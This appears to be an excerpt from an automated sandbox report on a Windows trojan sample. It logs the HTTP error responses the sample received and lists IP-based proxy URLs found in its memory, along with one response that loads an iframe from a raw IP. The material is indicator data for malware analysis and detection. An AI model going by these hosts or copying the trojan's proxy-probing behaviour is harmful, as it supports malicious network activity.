                      Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: squid/4.6Mime-Version: 1.0Date: Fri, 23 Feb 2024 13:28:31 GMTContent-Type: text/html;charset=utf-8Content-Length: 3702X-Squid-Error: ERR_DNS_FAIL 0Vary: Accept-LanguageContent-Language: enData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 39 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Fri, 23 Feb 2024 13:28:32 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Fri, 23 Feb 2024 13:28:34 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/5.7Mime-Version: 1.0Date: Fri, 23 Feb 2024 13:28:35 GMTContent-Type: text/html;charset=utf-8Content-Length: 3532X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from lb1X-Cache-Lookup: NONE from lb1:3128Via: 1.1 lb1 (squid/5.7)Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 6
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Fri, 23 Feb 2024 13:28:37 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Fri, 23 Feb 2024 13:28:37 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Fri, 23 Feb 2024 13:28:38 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1561Date: Fri, 23 Feb 2024 13:28:39 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/5.7Mime-Version: 1.0Date: Fri, 23 Feb 2024 13:28:41 GMTContent-Type: text/html;charset=utf-8Content-Length: 3532X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from lb1X-Cache-Lookup: NONE from lb1:3128Via: 1.1 lb1 (squid/5.7)Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 6
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/5.7Mime-Version: 1.0Date: Fri, 23 Feb 2024 13:28:42 GMTContent-Type: text/html;charset=utf-8Content-Length: 3532X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from lb1X-Cache-Lookup: NONE from lb1:3128Via: 1.1 lb1 (squid/5.7)Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 6
                      Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service Unavailable
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Server: ADM/2.1.1Connection: closeContent-Length: 519<html><head><meta http-equiv="Content-Type" content="textml;charset=GB2312" /><style>body{background-color:#FFFFFF}</style> <title>153</title><script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://114.115.192.246:9080/error.html"; }</script> </head><body><iframe style="width:100%; height:100%;" id="mainFrame" src="" frameborder="0" scrolling="no"/></body></htmlData Raw: Data Ascii:
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 23 Feb 2024 13:28:45 GMTServer: Apache/2.4.18 (Ubuntu)Content-Length: 306Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at heygirlisheeverythingyouwantedinaman.com Port 443</address></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service Unavailablecontent-length: 107cache-control: no-cachecontent-type: text/htmlData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C77B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://0.0.0.0
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C77B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://0.0.0.0://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://1.0.0.4
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://1.0.0.4://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://1.0.0.4:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://1.0.170.50
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://1.0.170.50://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://1.0.170.50:80
